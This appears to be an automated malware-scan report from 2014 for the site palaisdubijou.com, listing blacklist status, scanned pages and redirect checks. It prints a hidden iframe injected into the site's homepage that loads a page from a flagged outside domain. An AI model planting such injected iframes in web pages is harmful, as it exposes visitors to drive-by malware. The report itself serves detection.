Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=palaisdubijou.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://palaisdubijou.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 18:27:10 GMT Location: http://palaisdubijou.com.ar Server: Apache/2 Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
http://palaisdubijou.com.ar/ | 200 OK Content-Length: 5914 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nmsbaseball.com ...[6247 bytes skipped]... type="text/javascript" src="index_htm_files/png.js"></script><![endif]--> <!--[if IE]><script type="text/javascript">xr_aeh()</script><![endif]--><!--[if !IE]>--><script type="text/javascript">window.addEventListener('load', xr_aeh, false);</script><!--<![endif]--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=42 width=70 src=http://nmsbaseball.com/post.php?id=565404></iframe></body> </html> Malicious iFrame found. size: 70x42 src: http://nmsbaseball.com/post.php?id=565404 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=42 width=70 src=http://nmsbaseball.com/post.php?id=565404> | ||
http://palaisdubijou.com.ar/index_htm_files/roe.js | 200 OK Content-Length: 19882 Content-Type: application/javascript | clean |
http://palaisdubijou.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 18:27:16 GMT Location: http://palaisdubijou.com.artest404page.js Server: Apache/2 Content-Length: 318 Content-Type: text/html; charset=iso-8859-1 | clean |
http://palaisdubijou.com.artest404page.js/ | 500 Can't connect to palaisdubijou.com.artest404page.js:80 (Bad hostname) Content-Length: 200 Content-Type: text/plain | clean |
http://palaisdubijou.com.artest404page.js/test404page.js | 500 Can't connect to palaisdubijou.com.artest404page.js:80 (Bad hostname) Content-Length: 200 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: palaisdubijou.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 04 Jun 2014 18:27:10 GMT
Location: http://palaisdubijou.com.ar
Server: Apache/2
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
GET / HTTP/1.1
Host: palaisdubijou.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 04 Jun 2014 18:27:10 GMT
Location: http://palaisdubijou.com.ar
Server: Apache/2
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: palaisdubijou.com
Referer: http://www.google.com/search?q=palaisdubijou.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: palaisdubijou.com
Referer: http://www.google.com/search?q=palaisdubijou.com
Result:
The result is similar to the first query. There are no suspicious redirects found.